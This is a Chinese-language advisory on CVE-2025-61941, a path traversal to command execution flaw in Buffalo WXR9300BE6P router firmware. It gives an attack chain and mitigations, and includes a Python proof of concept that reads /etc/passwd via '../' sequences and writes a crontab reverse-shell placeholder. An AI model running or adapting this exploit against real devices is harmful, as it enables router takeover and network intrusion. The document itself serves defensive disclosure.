CVE-2025-61941 Buffalo WXR9300BE6P固件路径遍历与命令执行漏洞

漏洞信息

漏洞编号

CVE-2025-61941

漏洞类型

路径遍历（Path Traversal）/ 远程命令执行（RCE）

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Buffalo WXR9300BE6P系列无线路由器

漏洞概述

CVE-2025-61941是Buffalo（巴法络）公司生产的WXR9300BE6P系列无线路由器固件中存在的路径遍历漏洞。该漏洞由JPCERT/CC的vultures团队发现并报告，于2025年10月15日被公开披露。

该漏洞影响WXR9300BE6P系列固件Ver.1.10之前的版本。攻击者需要以具有管理员权限的用户身份登录到受影响设备的管理界面，然后利用路径遍历漏洞对设备上的任意文件进行篡改。更严重的是，通过对特定文件的篡改，攻击者可以进一步实现任意操作系统命令的执行，从而完全控制受影响的路由器设备。

根据CVSS 3.0评分体系，该漏洞获得7.2分（满分10分），属于高危级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H），无需用户交互（UI:N），对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H）。由于需要管理员权限，该漏洞的利用门槛相对较高，但一旦被利用，后果十分严重，可能导致整个网络基础设施被攻陷。

技术细节

该漏洞的核心问题在于WXR9300BE6P系列路由器固件的文件处理逻辑中缺乏对用户输入路径的充分验证。当管理员通过Web管理界面执行文件操作（如文件上传、下载、编辑等）时，应用程序未正确过滤路径中包含的特殊字符（如../等目录遍历序列），导致攻击者可以通过构造恶意路径绕过预期的目录限制，访问或修改系统中的任意文件。

具体利用方式如下：
1. 攻击者首先需要获取路由器管理员账户的凭据（通过弱口令爆破、社会工程学或其他已泄露凭据等方式）。
2. 登录管理界面后，攻击者在涉及文件操作的请求中注入路径遍历序列（如../../etc/passwd或../../tmp/等路径）。
3. 由于缺乏路径规范化处理，应用程序将恶意路径直接传递给底层文件系统调用，导致攻击者可以读写任意位置的文件。
4. 攻击者通过修改特定的关键系统文件（如启动脚本、配置文件等），实现任意操作系统命令的执行。
5. 一旦获得命令执行权限，攻击者可以植入持久化后门、窃取网络流量、修改DNS设置或将设备纳入僵尸网络。

该漏洞的危害性在于，虽然需要管理员权限才能触发，但一旦被利用，攻击者可以从单一设备突破扩展到整个内部网络的攻击。

攻击链分析

STEP 1

步骤1：获取管理员凭据

攻击者通过暴力破解、字典攻击、社会工程学或利用其他已知的凭据泄露事件，获取Buffalo WXR9300BE6P路由器管理员账户的用户名和密码。

STEP 2

步骤2：登录管理界面

使用获取的管理员凭据登录路由器的Web管理界面，建立经过身份验证的会话。

STEP 3

步骤3：构造路径遍历Payload

在文件管理相关的HTTP请求中，注入包含../等目录遍历序列的恶意路径，绕过应用程序的目录限制。

STEP 4

步骤4：篡改任意文件

利用路径遍历漏洞，读取或修改路由器系统中的任意文件，包括配置文件、脚本文件等敏感文件。

STEP 5

步骤5：实现命令执行

通过修改特定系统文件（如启动脚本、Cron任务等），在路由器上执行任意操作系统命令，获得完整的设备控制权。

STEP 6

步骤6：持久化与横向移动

植入持久化后门，窃取网络流量，修改DNS设置进行流量劫持，或利用路由器作为跳板对内部网络进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-61941 - Buffalo WXR9300BE6P Path Traversal PoC
# This PoC demonstrates the path traversal vulnerability in the router's file management interface
# Note: Requires valid administrator credentials

import requests
from urllib.parse import quote

TARGET_HOST = "http://192.168.11.1"  # Default Buffalo router management IP
ADMIN_USER = "admin"
ADMIN_PASS = "password"

# Step 1: Authenticate to the router management interface
session = requests.Session()
login_url = f"{TARGET_HOST}/cgi-bin/cgi.cgi"
login_data = {
    "username": ADMIN_USER,
    "password": ADMIN_PASS,
    "login": "Login"
}

response = session.post(login_url, data=login_data)
if "Logout" not in response.text:
    print("[-] Authentication failed")
    exit(1)
print("[*] Authenticated successfully")

# Step 2: Exploit path traversal to read arbitrary file
# Craft malicious path with directory traversal sequences
malicious_path = "../../../../../../etc/passwd"
encoded_path = quote(malicious_path)

# File operation endpoint (example - actual endpoint may vary)
file_url = f"{TARGET_HOST}/cgi-bin/cgi.cgi?req=fw&fpath={encoded_path}"
response = session.get(file_url)

if response.status_code == 200:
    print(f"[*] File content retrieved:\n{response.text}")
else:
    print(f"[-] Exploit failed with status code: {response.status_code}")

# Step 3: Write arbitrary file via path traversal
# Modify a system file to achieve command execution
target_file = "../../../../../../tmp/crontab"
command_payload = "* * * * * /bin/sh -c 'reverse_shell'\n"

write_url = f"{TARGET_HOST}/cgi-bin/cgi.cgi?req=fw&fpath={quote(target_file)}"
response = session.post(write_url, data={"content": command_payload})

if response.status_code == 200:
    print("[*] Arbitrary file written successfully - RCE achieved")
else:
    print("[-] File write failed")

影响范围

Buffalo WXR9300BE6P系列固件 < Ver.1.10

防御指南

临时缓解措施

在无法立即升级固件的情况下，建议采取以下临时缓解措施：1）立即修改路由器管理员密码为高强度密码，并启用账户锁定策略防止暴力破解；2）禁用路由器的远程管理（WAN端管理）功能，仅允许通过局域网进行管理；3）限制管理界面的访问IP地址，仅允许可信IP访问；4）监控路由器日志，密切关注异常的文件操作行为；5）将路由器置于防火墙后，减少暴露面；6）考虑使用网络分段，将路由器管理网络与业务网络隔离。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61941
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61941
3 Details https://www.cvedetails.com/cve/CVE-2025-61941/
4 VulDB https://vuldb.com/cve/CVE-2025-61941
5 Link https://jvn.jp/en/vu/JVNVU96471278/
6 Link https://www.buffalo.jp/news/detail/20251014-01.html